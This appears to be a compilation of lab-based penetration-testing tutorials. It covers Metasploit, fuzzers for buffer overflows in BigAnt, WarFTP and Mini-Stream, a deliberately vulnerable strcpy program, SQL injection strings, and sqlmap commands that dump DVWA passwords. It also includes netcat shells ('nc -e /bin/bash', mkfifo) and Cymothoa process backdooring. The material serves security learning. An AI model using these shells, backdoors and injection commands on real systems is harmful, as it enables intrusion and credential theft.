The Combination of Browser Exploit & File Exploit (Revision)

In this session, i will try to Combine the technique between Browser Exploitation and File Exploitation. First step that i do, i make a page of html. Inside that script html, i insert the link of js file. To copy the link of js file, i run the beef-Ng first.

Social Engineering and SET (Social Engineering Toolkit)

Social engineering

in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.

How To Use An Auxiliary On Metasploit

This time, I will try to make an example to use one of an auxiliary on metasploit. On the metasploit, there are so many auxiliary that we can use.

I will try to use an auxiliar/scanner/ftp/ftp_version

First, i open the msfconsole.

MsfPayload And MsfEncode

This time, i try to give the example of use msfpayload and msfencode. 


MsfPayload is code that we want the system to execute and that is to be selected and delivered by the Framework. The msfpayload component of Metasploit allows you to generate shellcode. Msfpayload is located in directory /opt/framework/msf3/ . If you want to see the list of the payload just type ./msfpayload -l

Linux Exploitation

This time, i will try to share about Linux exploitation. In this session, i will exploit Backtrack Linux. First, we make the script by using C language.

The script was like this

//I am a vulnerable thing.
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[500];
    strcpy(buffer, argv[1]); //Vulnerable function
   
    return 0;
}

Exploit Easy Chat Server With Buffer Overflow SEH Method

This time, i'll try to exploit Easy Chat Server Application.

Because this application was connect to the Network, so i  try to sniff it with Wireshark Tools in Backtrack and my Virtual Windows. Next, i try to open this chat from browser in my Backtrack.

I use admin admin in the field Name and Password. I see that user and Password from the easy chat server application.

Well then, i try to entry Let's Talk About Love room. 

Exploit BigAnt Server Application Buffer Overflow SEH

This time i try to Exploit BigAnt Server Application  With Buffer Overflow SEH method. BigAnt is a server messaging application.
Oke first step, i make a fuzzer script by using a python language programming like this.

#!/usr/bin/python
import socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target_address="192.168.56.101"
target_port=6660
buffer="USV "+"\x41"*2500+"\r\n\r\n"
sock.connect((target_address,target_port))
sock.send(buffer)
print("berhasil..berhasil..berhasil..horee")
sock.close()

Next i open BigAnt Server application with Ollydbg and run the fuzzer script. 

Exploit VUPlayer with Direct Ret Method

This time, i try to exploit with buffer overflow direct ret technique again. I will try to Exploit from the VUPlayer application in WIndows XP SP3 that i've installed on my Virtual Box in my Backtrack OS.

Lets start it. First step, i try to analyze all the type that can be support with VUPlayer. And i got the result like this.

From the information above, i know if the VUPlayer only support the vpl,m3u,cue,pls,asx, and wax extension. Now i try to open this application with ollydbg and i see an information like this

Exploit Mini-Stream RM Mp3 Converter Direct Ret Buffer Overflow

Well, this time i will try to exploit RM Mp3 Converter by using Direct Ret Buffer Overflow method from Backtrack OS. In this session, the tools i've use is :

1. Windows XP SP3 in Virtual Box
2. Mini-Stream RM Mp3 Converter v3.1.2.1
3. Ollydbg
4. Pattern Create
5. Pattern Offset
6. Metasploit Framework

Ok, First i try to make the fuzzer script by using a python language . The script that i've make was like this :

#!usr/bin/python
file="yuza.ram"

junk="http://"+"A" * 30000
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()

From the script above, i try to make a a ram file and try to overwrite the value of memory register with A value as much as 30000. Next, i try to run that script and it will appear a file that named yuza.ram.  Next, i try to execute that file by using mini-stream rm mp3 converter and booom. The mini-stream rm converter was crash. And then i try to see it with ollydbg.

Exploit WarFTP With Fuzzing Method (Direct RET Buffer Overflow)

In this time, I will try to exploit an application by using a fuzzing method. I have explained about fuzzing in my previous article. Ok now, an Application that I want to exploit is WARFTP. In this session, I use some tools like :

1. Ollydbg in my Windows XP on Virtual Box.
2. NC
3. Metasploit Framework
4. WarFTP server
5. Pattern Create
6. Pattern Offset

First, I make a simple fuzzer which use to send the data in potocol of FTP. This fuzzer script was made by using a Python Language. The script was like this:

#!/usr/bin/python

import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

buffer="\x41"*1000

s.connect(('192.168.56.101',21))

data=s.recv(1024)

print("sending evil data via USER command..")

s.send('USER '+buffer+'\r\n')

data=s.recv(1024)

s.send('PASS PASSWORD '+'\r\n')

s.close()

print("Finish")

I was gave a name xfuzz.py to that file. Next, I open the WarFTP in my Windows XP in my Virtual Box and I Start the Service of WarFTP. Then the status of WarFTP will be IDLE. Then, I try to connect ftp from my Backtrack by using NC. I typed a command nc 192.168.56.101 21 . If that was connected, the it will appear a notice like this:

Next, I start the xfuzz.py file that I have made before to see what happen with Warftp by using a command python xfuzz.py And Wow.. The warFtp is CRASH. I try to open the WarFTP again but it appear a message error like this.

Definition and Installation OllyDbg

OllyDbg is a 32-bit assembler level analysing debugger for Micros*ft Wind*ws. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg is often used for reverse engineering of programs.It is often used by crackers to crack software made by other developers. You can download OllyDbg in here. To install it, you just need to extract the zip file that you download.

Then just run file OLLYDBG which have an extension exe.

Register Memory

Register is a small memory access with very high-speed access.

Register used to store data and instructions were processed, while

that the data and other instructions are queued is processed will be stored in main memory. Registers in the CPU consists of:

1.Instruction Register (IR) used to store instructions that are

processed.

2.Program Counter (PC) is the register used to store address

location of main memory that contains instructions that are being processed. During the process of underway, the contents of the PC converted into main memory address containing instructions next to be processed. This allows to trace trail the next instruction in the main memory.

3. General purpose registers, the register, which has a wide range of functions that is associated with the data that is being processed. For example, if used for holds the data that is being processed is referred to as the register operands, whereas If it is used to hold the results processed are known as accumulator.

4. Memory Data Register (MDR), which is the register used to hold data or instruction that is sent from main memory to CPU, or holds the data to be saved to the main memory as a result of refined CPU.

5. Memory Address Register (MAR) is used to hold the address of data or

instruction in the main memory to be taken or which will be placed.

Now, Most computer use 9 register 32 bit, That was :

EAX      : Extended Accumulator Register
EBX      : Extended Base Register
ECX      : Extended Counter Register
EDX      : Extended Data Register
ESI        : Extended Source Index
EDI        : Extended Destination Index
EBP       : Extended Base Pointer
ESP       : Extended Stack Pointer
EIP        : Extended Instruction Pointer 

Definition of Fuzzing and Fuzzer

Fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion. 

Application fuzzing

Whatever the fuzzed system is, the attack vectors are within it's I/O. For a desktop app:

- the UI (testing all the buttons sequences / text inputs)

- the command-line options

- the import/export capabilities (see file format fuzzing below)

For a web app: urls, forms, user-generated content, RPC requests, ...

The advantage of fuzzing is that the test design is extremely simple, and free of preconceptions about system behavior.

The systematical/random approach allows this method to find bugs that would have often been missed by human eyes. Plus, when the tested system is totally closed (say, a SIP phone), fuzzing is one of the only means of reviewing it's quality.

The purpose of fuzzing relies on the assumption that there are bugs within every program, which are waiting to be discovered. Therefore, a systematical approach should find them sooner or later.

Fuzzing can add another point of view to classical software testing techniques (hand code review, debugging) because of it's non-human approach. It doesn't replace them, but is a reasonable complement, thanks to the limited work needed to put the procedure in place.

Fuzzer is a program which injects automatically semi-random data into a program/stack and detect bugs.

The data-generation part is made of generators, and vulnerability identification relies on debugging tools. Generators usually use combinations of static fuzzing vectors (known-to-be-dangerous values), or totally random data. New generation fuzzers use genetic algorithms to link injected data and observed impact. Such tools are not public yet.

Information Gathering Advanced

You can download the file in here

mkFIFO

The mkfifo() function shall create a new FIFO special file named by the pathname pointed to by path. The file permission bits of the new FIFO shall be initialized from mode. The file permission bits of the mode argument shall be modified by the process' file creation mask.

When bits in mode other than the file permission bits are set, the effect is implementation-defined.

If path names a symbolic link, mkfifo() shall fail and set errno to [EEXIST].

The FIFO's user ID shall be set to the process' effective user ID. The FIFO's group ID shall be set to the group ID of the parent directory or to the effective group ID of the process. Implementations shall provide a way to initialize the FIFO's group ID to the group ID of the parent directory. Implementations may, but need not, provide an implementation-defined way to initialize the FIFO's group ID to the effective group ID of the calling process.


I try to infect cymothoa with NC from my Backtrack to Ubuntu in Vbox. The version of NC in ubuntu is different than NC in Backtrack. In Backtrack, the version of NC is NC Traditional, but in Ubuntu, the version is NC OpenBSD.
In NC openBSD, there was nothing prefix -e to execute a program after connect. So i try to using mkfifo. 
First in Ubuntu terminal i typed a command mkfifo data .. After that i typed a command
nc -lk 8899 < data | /bin/bash > data
Ok now i open the console of my Backtrack and typed a command nc 192.168.56.101 8899 

Ok from the picture above, i know if i have been entry to the bin/bash of ubuntu. Then i look a proccess of ubuntu with a command ps -ax

 Last, i to entry the directory cymothoa and try to inject the proccess /bin/bash in ubuntu with command ./cymothoa -p 1415 -s 0 and i have succed to infect it.

ByPass Login Form Localhost/fbip With SQLi

Now i try to bypass a Login form in localhost/fbip

In field username, i typed an SQL cheat sheet '1 or 1=1#

Well, i got the result like this.

Finished, i have succes to bypass it.

Exploit DVWA File SQL Injection & Blind SQL Injection by Using SQLMAP

Now i try to exploit DVWA file SQL Injection & Blind SQL Injection by Using SQLMap.

First, i will try to check the different between SQL Injection & Blind SQL Injection.

How to check it.? now open the Damn Vulnerable Web Application(DVWA)

Then i change the security level to low like the picture below

Ok, now let's check the different both of them. Click on Menu SQL Injection Then in User ID column i type '1 and then will be appear a message error like this

Then, i clicked on the menu SQL Injection(Blind) and type '1 in user ID column. The result is like this

So, from the result above, i can make a conclusion if SQL Injection, when we typed '1, then it will show an error message. But in SQL Injection(Blind), if we typed '1, it will be back to that page again.

Ok, next step i try to exploit it. First i try to typed

'OR '1'='1' -- '; User Id Field and will appear information like this

Then open the sqlmap.

Sqlmap located in Apps -> Information Gathering -> Database Analysis -> MySQL Analysis -> SQLMAP

Next i typed command ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" --string="Surname" --dbs

The list of Database has been seen. Next, i typed command root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -D dvwa --tables to see lists of the tables in database dvwa. And the result is like this.

Next, i type a command root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -T users --column to see all contents inside the users table. And the result is like this

Then, i want to see the content of the password table. So i typed a command root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -C password --dump
 And finally i got the password like this.

Shodan

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. 

Shodan will searching all the information about the server software, what options the service supports, a welcome message or anything else that the client would like to know before interacting with the server. 

For example, following is a FTP banner:

220 kcg.cz FTP server (Version 6.00LS) ready.

This tells us a potential name of the server (kcg.cz), the type of FTP server (Solaris ftpd) and its version (6.00LS). For HTTP a banner looks like:

Maltego

              In this session, i will try to discuss about Maltego. Maltego is an tools that used to do an Information Gathering. Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates.  

1. Maltego is a program that can be used to determine the relationships and real world links between:

• People
• Groups of people (social networks)
• Companies
• Organizations
• Web sites

    2. Internet infrastructure such as:

• Domains
• DNS names
• Netblocks
• IP addresses

    3. Phrases

    4. Affiliations

    5. Documents and files

    6. These entities are linked using open source intelligence.

    7. Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.

    8. Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.

     9. Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.

    10. Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

    11. Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.

    12. Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.

    13. Maltego provide you with a much more powerful search, giving you smarter results.

    14. If access to "hidden" information determines your success, Maltego can help you discover it.

Put Cymothoa to Ubuntu Part 2 by Using NC

Ok, this article was a continue of a previous article about backdooring with NC to ubuntu.

Because the version of NC in my Ubuntu VBox is different than  NC in my Backtrack, so for the first step, I copy files nc.traditional, nc, and netcat in directory  /root/bin from my Backtrack to Ubuntu by using a SSH.

After that, put that file into directory /bin.

Ok, next step open the NC in backtrack then i typed command nc -l -v -p 8899 

Then in ubuntu typed a command nc 192.168.56.1 8899 -e /bin/bash in terminal.

Ok then will appear a notice if NC server has been connected to NC client.

root@bt:~# nc -l -v -p 8899

listening on [any] 8899 ...

192.168.56.101: inverse host lookup failed: Unknown server error : Connection timed out

connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 44565

Then i typed ls from my Backtrack and then will appear content in the directory ubuntu like this

Ok, next i copy directory folder cymothoa from my Backtrack to my Ubuntu by using ssh too and then from my Backtrack that have been connected to Ubuntu i try to start cymothoa.

Then i typed ps -ax to see the proccess in Ubuntu.

Last i typed a command ./cymothoa -p 1409 -s 0 -y 8899 to infect the ubuntu. And the result is like this.